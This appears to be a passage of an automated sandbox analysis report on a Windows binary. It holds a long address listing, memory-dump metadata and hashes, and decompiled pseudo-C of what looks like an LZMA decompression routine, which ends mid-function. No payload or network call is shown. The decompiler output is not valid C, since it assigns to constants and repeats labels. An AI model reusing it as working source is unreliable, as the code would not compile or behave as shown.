                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x004069b7
                                                                                                        0x004069bd
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                        • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                        • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                        • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
